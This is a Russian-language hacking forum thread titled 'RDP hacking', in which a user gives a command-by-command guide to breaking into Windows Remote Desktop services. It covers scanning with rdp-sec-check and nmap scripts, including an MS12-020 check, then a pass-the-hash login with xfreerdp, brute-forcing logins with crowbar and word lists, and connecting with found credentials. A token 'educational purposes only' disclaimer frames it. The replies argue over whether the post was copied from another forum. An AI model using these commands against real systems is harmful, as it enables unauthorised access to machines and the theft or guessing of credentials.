Загрузка...

Взлом RDP

Тема в разделе Kali Linux создана пользователем ЛДПР 4 июн 2022. 1478 просмотров

Загрузка...
  1. ЛДПР
    ЛДПР Автор темы 4 июн 2022 Заблокирован(а) 5060 23 авг 2019
    RDP (Remoute Desktop Protocol) - протокол для управления удалённым рабочим столом, по умолчанию использующий TCP 3389 порт.

    Официальное название для клиентского ПО — Remote Desktop Connection или Terminal Services Client (TSC)


    ДИСКЛЕЙМЕР:

    Автор статьи никого не призывает к правонарушениям и отказывается нести ответственность за ваши действия. Вся информация предоставлена исключительно в ознакомительных целях. Спасибо!

    Сбор информации:
    Инструмент rdp-sec-check проверяет, какие используются алгоритмы шифрования и методы аутентификации, а также некоторые другие настройки безопасности. В конце проверки rdp-sec-check подводит краткий итог о возможных проблемах безопасности службы удалённого рабочего стола.

    Установка в Kali Linux:

    Код
    sudo cpan
    install Encoding::BER
    Ctrl+d
    wget https://raw.githubusercontent.com/portcullislabs/rdp-sec-check/master/rdp-sec-check.pl
    chmod +x rdp-sec-check.pl
    ./rdp-sec-check.pl --help
    Пример использования:

    rdp-sec-check IP
    https://sun9-9.userapi.com/impg/felLlI3iKmSLk***yxtEb9esgPe6nrA20z3pfg/7l3uCoMXPfo.jpg?size=658x360&quality=96&sign=d0bbdb73236e0f3e4b53d899b34456fd&type=album

    Если после строки "[+] Summary of security issues" (краткий перечень проблем безопасности) ничего нет, значит явных проблем не выявлено.

    Также можно собрать информацию с помощью скриптов nmap:

    rdp-enum-encryption - определяет уровень безопасности и шифрования.

    rdp-ntlm-info - перечисляет инфу от удалённых служб RDP с включённой аутентификацией CredSSP (NLA).

    rdp-vuln-ms12-020 - проверяет систему на уязвимость ms12-020


    Для запуска всех скриптов сразу:

    sudo nmap -p 3389 -sU -sS --script rdp-enum-encryption,rdp-ntlm-info,rdp-vuln-ms12-020 IP
    [IMG]

    Pass-The-Hash:
    В kali linux по умолчанию установлен опенсорсный RDP-клиент "xfreerdp", который способен подключаться к системе по хэшу. Этот хэш хранится на системе, к которой нужно подключиться в формате NT.

    Команда для атаки:

    xfreerdp /d:domain_name /u:Administrator/pth:8846F7EAEE8FB117AD06BDD830B7586C /v:IP
    где после /d: — имя домена,

    после /u: — имя пользователя,

    после /pth: —хеш,

    после /v: — IP сервера.


    Но есть тонкость этого метода. Такой способ будет работать только для администратора, то есть подключится к юзерам из группы RDP Users нельзя.

    *****Force:
    Для атаки ****форсом рассмотрим crowbar.

    Для начала установим crowbar:

    sudo apt install crowbar
    И подтверждаем установку, нажав клавишу Y, когда это потребуется.

    В качестве цели можно указать даже целый диапазон IP-адресов с помощью опции -S file.txt, где "file.txt" - файл с IP-адресами. Опцией -s можно указать диапазон IP-адресов в формате CIDR. Если нужно указать одну цель, используется -s ip/32, где "32" - это маска.

    Команда для атаки:

    sudo crowbar -b rdp -U user.txt -C passwords.txt -s IP/32
    -b rdp -протокол

    -U user.txt - файл с юзерами

    -C - файл с паролями

    -s - Цель


    [IMG]

    Подключение:

    xfreerdp /f /u:пользователь /p:пароль /v:IP[:порт]
    Соглашаемся с сертификатом (yes)

    Для переключения полноэкранного режима на оконный:

    CTRL+ALT+ENTER
     
    4 июн 2022 Изменено
  2. RSPARKER
    RSPARKER 4 июн 2022 2238 19 фев 2018
    укажи то что у овера спиздил
     
    1. ЛДПР Автор темы
      RSPARKER, Не спиздил а поделился) Пиздят бабки а я делюсь)))
  3. EXoTuK
    EXoTuK 4 июн 2022 Забан3н 65 26 май 2022
    Полезно, недавно делал тему про получение RDP, но её снесли.
     
Top